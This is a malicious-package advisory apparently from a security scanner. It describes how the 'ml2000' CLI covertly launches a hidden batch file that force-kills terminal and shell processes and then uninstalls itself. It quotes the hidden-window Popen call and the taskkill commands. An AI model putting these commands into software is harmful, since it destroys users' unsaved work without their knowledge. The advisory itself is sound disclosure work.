MAL-2026-4756

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (871b57a598bf1230a64fa6ee85d442eb30f21915176835801871dc46c59cedf6) On invoking the `ml2000` CLI with no arguments, `interactive_menu()` in `src/ml_labs/generator.py` writes a batch file and launches it via `subprocess.Popen(["cmd.exe", "/c", bat_path], creationflags=DETACHED_PROCESS | CREATE_NO_WINDOW)`. The batch script runs `taskkill /IM WindowsTerminal.exe /F`, `taskkill /IM cmd.exe /F`, `taskkill /IM powershell.exe /F`, then `pipx uninstall ml2000`, then deletes itself. The use of detached/no-window flags hides this from the user, and the README advertises only ML notebook code generation — the destructive behavior is undisclosed. This is install/use-time destruction of installer-side resources: open terminal sessions are force-killed (causing loss of unsaved work in any other shell the user has open) and the package removes itself behind the user's back. Project metadata is also placeholder (`Your Name <your.email@example.com>`), corroborating that this is not a legitimate maintained release.